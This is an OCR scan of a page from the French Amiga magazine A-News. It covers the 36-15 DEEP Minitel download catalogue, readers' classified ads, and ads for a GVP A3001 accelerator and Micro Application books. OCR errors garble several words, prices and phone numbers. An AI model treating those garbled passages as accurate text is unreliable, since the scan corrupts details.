AMIGA Anews Programmes: 1 8 1 VirusX_3.1 détruit les Virus 2 Achetez-Anews Pubs... en Alerte 3 ReadAII Lit tous fichiers disque.c & disk.c setcolor.c dessin.c am-pc.c gadget.c 4 Anews_4 5 Anews_5 6 Anews_6 7 Anews 9 Suite Télécharger : N' ... + Envoi Descriptif N’ + Guide DIA FOR BAL JEU AFF RUB TEL Vous retrouvez donc lc nom du thème, l’indication numéro du premier programme de la page nombre total de programmes dans ce thème, les programmes avec : le numéro, le nom et un bref descriptif. Si vous n'êtes pas à la dernière page du thème, les programmes suivants sont accessible par la touche
minitel SUITE.
Lorsque vous aurez fait votre choix, lc numéro du programme suivit de la touche ENVOI vous permettra d’accéder au menu de téléchargement du programme. Ce menu vous proposera les différent programmes constituant l'application choisie (exécutable, sources, docs...). Vous choisissez le programme voulu et hop vous téléchargez (un écran explicatif vous guidera). Je vous rappelle que si, une fois dans cette page vous ne voulez rien télécharger, ou bien après un téléchargement, vous revenez au menu supérieur (listes des programmes sur DEEP) grâce à la touche SOMMAIRE L'explicatif d’un programme,
accessible par n‘+GUIDE ne fonctionne pas. Notez que vous pouvez là encore changer directement de rubrique en lapant les mots clés (AFF,TEL, ANEWS...) Voici maintenant des programmes téléchargeables, listés par thèmes, tels que vous les rencontrerez sur DEEP.
AMIGA Jeux Programmes: 1 20 1 KamiKazChess 2 Amocha 3 StarTrekTHvia 4 Dad 5 Flipper 6 LabyrinthH 7 FivcInLine Jeu d’Echecs fou LE Spacclnvaders Questions StarTrck Casse-Tete Un Othello... Jeu de rôle Puissance 5 Suite Télécharger : N°... + Envoi Descriptif N° + Guide DIA FOR UAL JEU AFF RUB TEL Programmes: 8 20 8 YatchC3 Jeu de Yams 9 Castle Aventure graphique 10 PacMan Un Classique !
11 Tiles Réflexion 12 Whecl_Fortune Jeu en basic... 13 BlackBox Tyouver les atonies 14 King Cartes en solitaire AMIGA Jeux Programmes: 15 20 15 YachtC Yatze 16 SpaceBusincss Stratégie économique 17 Tetrix Action & Réflexion 18 BreakOut Casse briques sympa 19 Hearts Jeux de cartes 20 Plutos Un ’tit jeu d’action Télécharger : N° ... + Envoi Descriptif N° + Guide DIA FOR BAL JEU AFF RUB TEL AMIGA Graphisme Programmes: 1 18 11FF2PCS 2 SlideShow 3 Sccnery 4 Femmcs-Digit 5 Images!!!
6 IFF 7 HAM 8 Utilitaires 9 SCS 10 ShowAnim 11 Hypno 12 Fonts 13 Brush2C 14 ILBM2C 15 EditGadget 16 MandcIBrot 17 Spin3 18 Planet Puzzle d’image IFF SlideShow Scénario aléatoire Superbes portraits Superbes Images Des images IFF... Des images HAM... Charger des images SlideShow Construc Animateur Aegis Hypnotisant...!
Pleins de Fonts Cre Brush - .c Cre Images - .c Cre Gadget - .c Fractalcs !!
Demo 3D (sources) Transforme image Télécharger : N”... + Envoi Descriptif N° + Guide DIA FOR BAL JEU AFF RUB TEL Cette liste sera complétée le mois prochain par le contenu des rubriques Musique, Utilitaires, et autres. Toute ressemblance avec des robinets ou mélangeurs existants ou ayant existés ne serait que pure coincidence.
La rédaction décline toute responsabilité sur les propos de l'auteur du présent article.
Chorizo Kid Des infos du serveur.
Pour connaître le mode d’emploi de 36-15 DEEP, les mots de commande pour envoyer les messages, etc., tapez Guide au premier écran du serveur.
Imprimé par NEWS PRINT, 24500 Eymet MATERIEL Vends IMPRIMANTE LASER NEC LC-
08. 300 dpi, 8 pafes par minute, connectable sur tout onlinatcur
(série cl parallèle), peu servie (3500 copies). Prix 7500F.
Contacter Patrick FEDIDA, 6 rue du Chemin-Vert, appt
152. 93000 Bobigny. Tél (1)48-31-18-44.
Vends AMIGA 500 du 8 89, garantie 2 ans extension 512k + lecteur A1010 +300 disks + livre sur l'AnrigaDos + des Irilos de docs + 2 joysticks + boîtes de rangement + A-News + Commodore Revue + tapis de souris, le tout pour 7500F. Demander Thierry au 64-56-48-59 en région parisienne.
Vends AMIGA 1000 prix 2000F; ext mémoire SPIRIT 1NBOARD 1000 avec horloge et 1.5Mo de RAM 2500F; Sidecar Amiga 1060 prix 3000F. Tél 60-48-53-20 après 19h, demander. Michel.
Vends A2000A 5500F, carte XT + extension 640Ko + serie + parallèle + horloge + jeux + 8087 5000F. Tél après 20h à Olivier au
(1) 69-00-56-54.
Vends AMIGA 1000 PAL 512Ko lecteur interne 3, moniteur + NBX logiciels 5000F; EXTENSION MEMOIRE 2Mo pour Amiga 500 1000 5000F; LECTEUR EXTERNE Ami- ga 1010 avec interupteur 800F Le tout 10800F + Digiview 3.0 (jamais servi). Tél 84-22-49-45 (Dcp.90) heures repas.
Vends EXTENSION AMIGA 500 512Ko complète 990F, lecteur 3,5" DF 1190F, 5,25" DF avec fre boot 1290F. Tel 88-84-92-17, Jean-Picrrc.
Vds AMIGA 500 + EXTENSION S12KO + ECRAN 1084 + MINI AMP TRILOGIC avec 2 enceintes stéréo + boîte de rangement 40 disks + joystick 500 pro + tapis souris + housses + docs + revues informatiques + disks.
Prix 6 500F au tél 39-65-69-42.
Vends C128D + logiciels, jeux + livres 20Ç0K Tél 78-70-56-95 à 69 Fey in.
OFFRE SPECIALE Les 12 anciens numéros il'A-News de votre choix 175F port (surface) compris " Economisez 70F - A-N%ews - Premier journal français dédié à l'Amiga® Abonnement d’un an (12 numéros) 180F Pour l’étranger (tous pays) 240F (Avion 400F) Bulletin d’abonnement ci-dessous, mais si vous ne voulez pas découper votre A-News envoyez-nous votre demande sur papier libre. Les numéros précédents sont disponibles au prix de 20F par numéro + 5F frais de port, étranger compris. (Le port cout 5F, quel que soit le nombre de journaux commandés) Les petites annonces sont
gratuites pour les particuliers et les clubs Oui, je m’abonne pour 12 numéros à panir du numéro (dd»i d enregistrera enl environ 3 sexnnr.es. Vote «bonnement peut commencer à partir de n’imp Nom ....Prénom .... Adresse ..... importe quel numéro,) Bon à découper et à adresser avec votre règlement au nom d’A-News à : A-News Diffusion, 24500 Eymet Les abonnés sont priés de noter que le numéro du dernier journal qui leur sera envoyé est imprimé sur l’etiquette d’envoi, et de renouveler leur
abonnement en temps voulu.
Vends AMIGA 500 + EXTENSION MEMOIRE AS01 + logiciels. Tél 51-62-05-15.
EXCEPTIONNEL!!! Vends Amiga 1000 Pal + moniteur couleur A1081 + Imprimante MPS 1000 + deuxième lecteur A1010 avec Kickstart et Workbench 1.1. 1.2. 1.3. I.e tout en très bon état, ccdc à 5900F. Pour tous renseignements tél (1)48-53-34-09, demander Jean Michel.
Vends A500 + EXT 5]2ko + drive 3 CA880 + moniteur coul HR + livres (Bible + graphisme) + progs 7500F. Franck, tél 45-94- 53-06 (dép 94).
Vends pour A2000, KIT PC XT; lecteur 5" + carte A2088. Matériel non déballé, sous garantie. Prix intéressant. Alain au 81-95-17 78 après 18h.
Vends EXTENSION MEMOIRE 512K pour Amiga 500,900F. Tél 48-40-99-67.
EXTENSION RAM POUR A500, CAPACITE 2MB ponant à 25 Mégas la RAM totale. Interrupteur horloge, 3500F + contre- remboursement. Tel 88-93-67-66 le weekend.
Vds DIGITALISEUR VIDEO COULEUR pour Amiga, garantie de 6 mois; interface plus softs, 700F plus port. Tél 61-74-30-18 HR.
Vends AMIGA 20CO + écran A1084S + CARTE XT + lecteur 5’’l 4 + imprimante Citizen 120-D + joystick + jeux + Nbx livres explicatifs + un meuble pour ordinateur. Ens sous garantie vendu 14000F Tél 64-08-37-49 ap 18h ou week-end.
CONTACTS ET LOGICIELS ALICE Club Informatique, Maison des Jeunes, rue Clémenceau, 57360 AMNE- V1LLE. Tél 87-71-08-03.
OUVERTURE D'UN CLUB AMIGA à Aix-enProvcnce. De nombreuses activités sont proposées (Domaine Publique, tarifs spéciaux sur hardware.. Pour de plus amples informations contactez-moi, RAME Xavier, Mas Sainte Marie, Chemin de Bon Rencontre, 13080 LUYNES, tel 42-24-03-47 Oc soir).
Vends PROFESSIONAL PAGE version Française (valeur 3650F), SUPERBASE PRO (valeur 1490F), MAXIPLAN PLUS (valeur 2365F), SUPERJ1ACK (valeur 490F). Tous ces programmes sont vendus avec boîtier et documentation d’origine, en bon état à des prix très intéressants. Tel 43-32-65-79 Uvry-Gargan.
1er CLUB DP Franco-Belge: recevez chaque mois notre sélection de 10 D.P. dont un anti-virus "up-to-date". Promotion de lancement 70FF ou 420 FB (TTC), envoyez vos mandats postaux (inlemationaux) à WOOT DE TRIXE Y., 60 rue Stroobanls Boite 2, 1140 EVERE, BELGIQUE.
LES JOUEURS DU CLUB DE VIENNE recherchent désespérément clubs ou groupe ayant quatre fanas de Kick-off de très haut niveau en vue confrontation. Faibles s'abstenir.
Ecrire à 68000 VIENNE INFORMATIQUE. 15 Le Plan des Aures, 38780 Pont-Evequc, ou tél 74-57-20-78.
Recherche GRAPHISTES, MUSICIENS (Soundtracker) et programmeurs en GFA. Gwé- naël ROPERT, 24 rue de Touraing, 56300 Poniivy, Tél 57-27-87-94 VENDS ORIGINAUX de SDI, EXPLORA B, OPERATION JUPITER, BARDS TALÉ, INTERCEFrOR. à moitié prix. Eric au (16) 43- 81-40-57 après 18h.
Vends ORIGINAUX état neuf: Digitaliscur PERFECT SOUND (v.24f) 500F + Super- Hang-on 100F + Dragon s Lair 300F + Silk- worm 100F + B.A.D. 150F ou 1000F le tour.
Tel 64-07-19-76 (demander Thierry).
Vends ORIGINAUX pour Amiga avec doc.
INTERCEPTOR 100P, SKYFOXII 100F, JEANNE D’ARC 120F, AEGIS SONDC 2.0 400F, LE GRAND LIVRE DE L’AMIGABA SIC avec le disk 200F. Téléphone après h.dc b. 87-93-22-43, demander Marc Vends "LE GRAND LIVRE DE L'AMIGABASIC" 150F, "Amiga en Famille’’, 90F, récepteur VI1F de 140 à 170 Mhz (bandes PRO et AMATEUR) 450F Et le port est compris (Ouai mon gars). Cherche contact pour échanges divers. Mr FRANQUENK Michel. Le Verger des Arènes, Lot.69, 83600 Frejus. Tél 94-53-66-02 après 19h.
Notre SERVICE DF. DISTRIBUTION diffuse des MEGADEMOS, INTROS, COMPILATIONS MUSICALES. SL1DE-SHOWS.
JEUX, ainsi que les meilleurs utilitaires du domaine public pour Amiga (dont DBW-Rcnder V2.0). Notre catalogue de plus de 300 disks est disponible contre 1 timbre à 2,20 Frs. FD, BP18,59115 LEF.RS. Vends DISK DE FONTS (20 séries) pour vos Slidcs 25F port compris. 2 disk instruments IH-. 1 . Disk 54 perçus 1FF 25F. Vends SAMPLER STEREO 500F (acheté 1CO0F) ss garantie. CHERCHE disks sons et ul du dom. Pub., Dos2Dos efficace sans 2d drive. Hacène LAHRECHE 53 rue Amiral Mouchez 75013, tél 45-81-63-94 (surtout par courrier. Tél entre 191r-20ii.
CHERCHE CONTACTS sur Amiga au monde entier, REPONSE ASSUREE à 25 MIIz.
Ecrire à YOUNES R1AD, 03 Rue des Frères Amrouches, Alger 16CO0, Algérie.
Vends LIVRES POUR AMIGA: SOS AmigaDos, AnrigaBasic + le Grand Livre de l'AnrigaBasic + le livre de l'AnrigaDos + le manuel de Maxiplan 500 en français + N* 6,8,9,10,11 de Commodore Revue. Le tout 300F. Tél 43-32-65-79.
Vends 6 livres Micro Application pour C64 & C128 Bible, Peeks & Pokes, Trucs & Astuces.. .DELLIEUX Aurélien, 87 rue Cosserat, 80000 Amiens, tél 22-44-10-44.
Achète cartouches de jeux VECTREX, ainsi que clavier de programmation VECTREX et cartouche MAIL PLANE pour stylo optique.
DELLIEUX Florian, tél 22-44-10-44.
EMPLOI URGENT La technique de l’Amiga vous intéresse, vous cherchez un JOB, nous pourrons sans doute travailler ensemble dans la région de VERSAILLES, téléphonez à TIASE (1)46-20- 35-16.
Processeur MC68030 et co-processeur EPI 68882 cadencés à 25 Mhz.
Plus de 3 lois la puissance d'un 68020. 16 lois celle d'un 68000.
Carte d'extension mémoire RAM 32 bits de 4 ou 8 Mo entièrement " Autoconlig" et adressable par n'importe quel périphérique DM A. Supporte totalement le mode Burst du 68030 grâce a un adressage Nibble qui permet un accès ;i la R M 32 bits sans état d'attente même a 25 Mhz et assure une technologie supérieure aux systèmes accélérateurs actuels et à venir.
A3001 L’ODYSSEE DE LA PUISSANCE parce qu'il serait absurde de proposer un disque dur ST-506 8 bits pour exploiter une telle puissance, le système 300I intègre un contrôleur de disque AT autoboot accédant directement au bus 32 hits du 6803(1.
Permettant des taux de transfert supérieurs a 700 Ko s.
C'est un produit GVP !
Il existe plusieurs solutions évolutives pour accéder à la puissance.
Renseignez vous auprès de CIS ou d'un point de vente - conseil (îVP (liste sur simple demande au 56-374-378).
Carte 68030-68882 25 Mhz !.. Carte 4 8 Mo RAM 32 bits Disque Dur Quantum - A3001 Description générale: 68030 + 68882 + 4 ou 8 Mo de RAM 32 bits + disque dur QUANTUM.
AT 40 ou 80Mo 11 19ms.
N'occupe que le slot CPU de l'Amiga 2000!
• Architecture asynchrone permettant des cadences d'horloge très
élevées et une parfaite compatibilité avec les genlocks.
Installation immédiate.
Manuel et disquette en français.
Garantie 1 an.
CIS. 571, Cours de la LIBERATION - 33400 TALENCE - TEL : 56-374-378 FAX : 56-040-895 PHOTOS ET CARACTERISTIQUES NON CONTRACTUELLES • AMIGA EST UNE MARQUE DEPOSEE DE COMMODORE AMIGA MICRO APPLICATION AMIGA MEME COMBAT.
AMIGA LE LIVRE DU LA BIBLE DE L'AMIGA Ce véritable livre de référence, accessible à tous, vous présente point par point la structure interne de la machine, du Hardware aux routines de l'AmigaDOS.
Profitez d'une multitude d'informations (dont certaines inédites) pour programmer en multi-tâche, détourner les interruptions ou gérer les entrées sorties.
Réf. 512 299 F LE LIVRE DU GRAPHISME § Près de 800 pages d'informations précieu- Ë ses et d'exemples de programmes dans ?
MICRO APPLICATION 58 RUE DU FG POISSONNIERE 75010 PARIS TEL (1) 47 70 32 44 . Signature ? Mandat ? Chèque à l’ordre de MICRO APPLICATION date d'expiration - Distribution: Genève : Micro Distribution Tél. (022) 84 34 82 Bruxelles : Easy Computing Tél. (02) 343 05 52 EDITIONS MICRO APPLICATION BIEN DEBUTER ENC Avec cet ouvrage, analysez le C dans ses moindres détails : les pointeurs, les tableaux, les adresses..., et familiarisez vous avec l'éditeur et le compilateur, les différents types de fonctions... Mais aussi disposez de nombreux exemples commentés, de programmes standards (Lattice et
Aztec),... Réf. ML 553 149F LE LIVRE DU GFA BASIC 3.0 Afin d’optimiser votre programmation, ce livre vous propose de nombreux exemples d'applications en GFA, des conseils précieux et vous détaille progressivement chaque instruction de ce langage : variables, entrées sorties, graphisme, son. Réf. 562 149 F tous les domaines d'applications : tracé d’objets, animation, programmes en Basic, C, ou Assembleur... Débutants ou spécialistes, cet ouvrage de référence vous accompagnera à votre rythme tout au long de vos créations. Réf. 505 249 F LE GRAND LIVRE DE L'Amiga- BASIC Riche en
exemples pratiques, cet ouvrage aborde simplement les sujets les plus complexes : création d'effets sonores et graphiques pour faire parler le synthétiseur vocal ou gérer le lecteur de disquettes. Vous découvrirez également : les compilateurs AC BASIC, Hl SOFT, l'utilitaire Wind- ow, les systèmes en AmigaBasic,... et bien plus encore. Réf. ML 504 249 F TRUCS ET ASTUCES Nouvelle édition entièrement réactualisée.
Une foule d'astuces et de trucs inédits sur les nouvelles commandes de l'Amiga. Sachez comment gagner du temps en utilisant Amiga DOS et WorkBench 1.3, comment affiner et améliorer vos techniques de programmation avec le CLI et AmigaBA- SIC, comment écrire votre programme de détection de virus et bien plus encore. Réf. ML570 129 F. Réf. ML670 229 F avec la disquette.
LE LIVRE DE LA MUSIQUE Découvrez tous les aspects de la création musicale sur Amiga, des notions fondamentales, aux éléments de la synthèse sonore, jusqu'à la gestion des circuits spécialisés. Avec cet ouvrage, décuplez les possibilités de reproduction sonore de l'Amiga et découvrez des informations fondamentales et inédites qui vous aideront à réaliser des applications musicales évoluées. Réf. ML 632 199 F avec la disquette.

Click image to download PDF

Merci pour votre aide à l'agrandissement d'Amigaland.com !


Thanks for you help to extend Amigaland.com !
frdanlenfideelhuitjanoplptroruessvtr

Connexion

Pub+

62.9% 
8.8% 
2.9% 
2.2% 
1.9% 
1.7% 
1.2% 
1.1% 
0.8% 
0.8% 

Today: 42
Yesterday: 97
This Week: 245
Last Week: 863
This Month: 2090
Last Month: 3511
Total: 84304

Information cookies

Cookies are short reports that are sent and stored on the hard drive of the user's computer through your browser when it connects to a web. Cookies can be used to collect and store user data while connected to provide you the requested services and sometimes tend not to keep. Cookies can be themselves or others.

There are several types of cookies:

  • Technical cookies that facilitate user navigation and use of the various options or services offered by the web as identify the session, allow access to certain areas, facilitate orders, purchases, filling out forms, registration, security, facilitating functionalities (videos, social networks, etc..).
  • Customization cookies that allow users to access services according to their preferences (language, browser, configuration, etc..).
  • Analytical cookies which allow anonymous analysis of the behavior of web users and allow to measure user activity and develop navigation profiles in order to improve the websites.

So when you access our website, in compliance with Article 22 of Law 34/2002 of the Information Society Services, in the analytical cookies treatment, we have requested your consent to their use. All of this is to improve our services. We use Google Analytics to collect anonymous statistical information such as the number of visitors to our site. Cookies added by Google Analytics are governed by the privacy policies of Google Analytics. If you want you can disable cookies from Google Analytics.

However, please note that you can enable or disable cookies by following the instructions of your browser.

Visitors

Visite depuis
03-10-2004
Visite depuis
23-02-2014